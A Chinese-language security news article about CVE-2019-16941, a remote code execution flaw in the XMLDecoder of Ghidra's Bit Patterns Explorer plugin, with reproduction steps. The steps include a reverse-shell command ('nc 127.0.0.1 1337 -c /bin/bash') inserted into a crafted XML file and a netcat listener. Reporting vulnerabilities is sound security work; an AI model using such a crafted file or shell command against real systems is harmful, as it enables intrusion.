歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

CVE-2019-16941: NSA Ghidra工具RCE漏洞

來源:本站整理 作者:佚名 時間:2019-10-06 TAG: 我要投稿

Ghidra是由美國國家安全局(NSA)研究部門開發的軟件逆向工程(SRE)套件,用于支持網絡安全任務。Ghidra是一個軟件逆向工程(SRE)框架,包括一套功能齊全的高端軟件分析工具,使用戶能夠在各種平臺上分析編譯后的代碼,包括Windows、Mac OS和Linux。功能包括反匯編,匯編,反編譯,繪圖和腳本,以及數百個其他功能。Ghidra支持各種處理器指令集和可執行格式,可以在用戶交互模式和自動模式下運行。用戶還可以使用公開的API開發自己的Ghidra插件和腳本。

https://ghidra-sre.org/ghidra_9.0_PUBLIC_20190228.zip
https://github.com/NationalSecurityAgency/ghidra
周六,安全研究人員報告了一個影響Ghidra的中危漏洞,根據NIST漏洞數據庫的描述,攻擊者利用該漏洞可以遠程入侵暴露的系統。該漏洞CVE編號為CVE-2019-16941,目前還沒有關于該漏洞的補丁。
漏洞位于Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java的XMLDecoder,會引發Bit Patterns Explorer插件的遠程代碼執行。在啟用了experimental mode(實驗模式)的Ghidra中,如果Bit Patterns Explorer的Read XML Files特征使用修改的XML文件,就會導致任意代碼執行。漏洞的利用需要攻擊者通過插件和正常的項目外的加載進程來加載惡意偽造的XML文件(由DumpFunctionPatternInfoScript創建但是被攻擊者修改的XML文件,比如調用java.lang.Runtime.exec call)。
復現該漏洞的步驟如下:
1: 用CodeBrowser打開二進制文件
2. 在Window->Script Manager中選擇"DumpFunctionPatternInfoScript"
3. 導出得到的XML文件
4. 在文件末尾的最后一個object閉合標簽之后,閉合標簽之前加上以下內容:
  nc 127.0.0.1 1337 -c ’/bin/bash’ 
5. 用命令nc -lvnp 1337打開本地監聽服務器
6. 在Window->Function Bit Patterns Explorer中用File->Configure…啟用實驗模式
7. 在打開的插件窗口中,點擊Read XML Files,指向XML保存到目錄并點擊OK
8. 返回監聽器,查看打開的shell
事實上,在運行該插件時,是不應該執行xml文件中的代碼的。
根據NSA Ghidra項目github的消息,目前補丁正在開發中。
https://github.com/NationalSecurityAgency/ghidra/issues/1090
這也并非首次在Ghidra中發現漏洞。今年3月,安全研究人員發布了攻擊Ghidra v9.0及更低版本的XML外部實體(XXE)漏洞。7月,研究人員發現了一個高危的路徑提取漏洞CVE-2019-13623。
https://threatpost.com/bug-in-nsas-ghidra/148787/
 

【聲明】:黑吧安全網(http://www.gkrbnd.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        福彩原副主任